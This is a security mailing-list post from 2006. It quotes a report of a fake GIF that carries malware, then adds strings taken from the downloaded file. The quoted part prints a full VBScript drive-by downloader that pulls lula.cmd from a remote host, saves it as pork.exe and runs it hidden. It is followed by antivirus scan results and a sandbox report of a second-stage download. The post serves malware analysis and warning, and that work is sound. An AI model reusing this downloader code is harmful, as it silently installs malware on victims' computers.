To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
Some interesting strings from lula.cmd:

http://www.lasgo.be/mp3.php?id=455
\imgrt.scr
\nostd.scr
\bsys.scr


On Fri, Dec 29, 2006 at 12:06:43PM -0500, Tom babbled thus:
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> ----------
> This one was new to me. A gif that wasn't.  Came via email. Link was 
> tohttp://lulavergonha.rg3.net which framed a gif 
> (http://mywebpage.netscape.com/lu7y7u/lula.gif) that firefox would 
> not deal with. DOes explorer reall open these?
> 
> Anyway, content of gif had javascript to download the maleware 
> (beware below is an active link as of this email):
> 
> <script language="VBScript">
> 
>      on error resume next
> 
> 
> 
>      ' due to how ajax works, the file MUST be within the same local domain
>      dl = "http://mywebpage.netscape.com/lu7y7u/lula.cmd";
> 
>      ' create adodbstream object
>      Set df = document.createElement("object")
>      df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
>      str="Microsoft.XMLHTTP"
>      Set x = df.CreateObject(str,"")
> 
>      a1="Ado"
>      a2="db."
>      a3="Str"
>      a4="eam"
>      str1=a1&a2&a3&a4
>      str5=str1
>      set S = df.createobject(str5,"")
>      S.type = 1
> 
>      ' xml ajax req
>      str6="GET"
>      x.Open str6, dl, False
>      x.Send
> 
>      ' Get temp directory and create our destination name
>      fname1="pork.exe"
>      set F = df.createobject("Scripting.FileSystemObject","")
>      set tmp = F.GetSpecialFolder(2) ' Get tmp folder
>      fname1= F.BuildPath(tmp,fname1)
>      S.open
>      ' open adodb stream and write contents of request to file
>      ' like vbs dl exec code
>      S.write x.responseBody
>      ' Saves it with CreateOverwrite flag
>      S.savetofile fname1,2
> 
>      S.close
>      set Q = df.createobject("Shell.Application","")
>      Q.ShellExecute fname1,"","","open",0
> 
> 
> 
>      </script>
> 
> [ scan result ]
> AntiVir       7.3.0.21/20061229       found [TR/Delphi.Downloader.Gen]
> Authentium    4.93.8/20061229 found nothing
> Avast 4.7.892.0/20061221      found nothing
> AVG   386/20061229    found nothing
> BitDefender   7.2/20061229    found [Trojan.Downloader.Banload.MG]
> CAT-QuickHeal 8.00/20061229   found nothing
> ClamAV        devel-20060426/20061229 found nothing
> DrWeb 4.33/20061229   found nothing
> eSafe 7.0.14.0/20061228       found nothing
> eTrust-InoculateIT    23.73.101/20061229      found nothing
> eTrust-Vet    30.3.3289/20061229      found nothing
> Ewido 4.0/20061229    found [Downloader.Delf.acn]
> F-Prot        3.16f/20061229  found nothing
> F-Prot4       4.2.1.29/20061229       found nothing
> Fortinet      2.82.0.0/20061229       found nothing
> Ikarus        T3.1.0.27/20061229      found 
> [Trojan-Downloader.Win32.Dadobra.CV]
> Kaspersky     4.0.2.24/20061229       found nothing
> McAfee        4928/20061228   found nothing
> Microsoft     1.1904/20061227 found nothing
> NOD32v2       1946/20061229   found [probably a variant of 
> Win32/TrojanDownloader.Banload.BAY]
> Norman        5.80.02/20061229        found [W32/Downloader]
> Panda 9.0.0.4/20061228        found [Suspicious file]
> Prevx1        V2/20061229     found nothing
> Sophos        4.13.0/20061228 found nothing
> Sunbelt       2.2.907.0/20061218      found nothing
> TheHacker     6.0.3.139/20061229      found nothing
> UNA   1.83/20061228   found nothing
> VBA32 3.11.1/20061229 found nothing
> VirusBuster   4.3.19:9/20061229       found nothing
> 
> [ notes ]
> norman sandbox: [ General information ]
>      * **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: 
> [EMAIL PROTECTED] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH 
> PASSWORD)**.
>      * File length:        43520 bytes.
> 
>   [ Changes to filesystem ]
>      * Creates file C:\WINDOWS\SYSTEM32\imgrt.scr.
> 
>   [ Network services ]
>      * Downloads file from 
> http://www.aquipodeserbom.xpg.com.br/firma01.bmp as 
> C:\WINDOWS\SYSTEM32\imgrt.scr.
> 
>   [ Security issues ]
>      * Starting downloaded file - potential security problem.
> 
> 
> 
> -- 
> 
> Tom Shaw - Chief Engineer, OITC
> <[EMAIL PROTECTED]>, http://www.oitc.com/
> US Phone Numbers: 321-984-3714, 321-729-6258(fax), 
> 321-258-2475(cell/voice mail,pager)
> Text Paging: http://www.oitc.com/Pager/sendmessage.html
> AIM/iChat: [EMAIL PROTECTED]
> Google Talk: [EMAIL PROTECTED]
> skype: trshaw

-- 
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.
_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

Reply via email to